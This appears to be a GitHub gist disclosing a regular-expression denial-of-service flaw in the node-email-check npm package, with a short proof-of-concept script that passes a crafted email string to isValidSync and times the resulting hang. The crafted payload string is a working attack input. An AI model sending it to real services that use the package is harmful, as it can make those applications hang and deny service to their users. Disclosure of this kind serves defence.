Created
October 19, 2023 19:43
-
-
Save 6en6ar/712a4c1eab0324f15e09232c77ea08f8 to your computer and use it in GitHub Desktop.
Vulnerability inside the node-email-check npm package through version 1.0.4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The regex on line 10. inside https://github.com/teomantuncer/node-email-check/blob/main/main.js is vulnerable to a Regex Denial of Service | |
| if a malicious string is provided causing the application using the package to hang. | |
| Proof of concept code to test it: | |
| const emailCheck = require('node-email-check'); | |
| // async request with mx check | |
| //await emailCheck.isValid('example@email.com'); | |
| // sync request without mx check | |
| console.time('[ + ] Time passed -> '); | |
| //payload | |
| var chck = emailCheck.isValidSync('-@{IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"'); | |
| //var chck = emailCheck.isValidSync('validemail@example.com'); | |
| console.log(chck); | |
| console.timeEnd('[ + ] Time passed -> '); | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment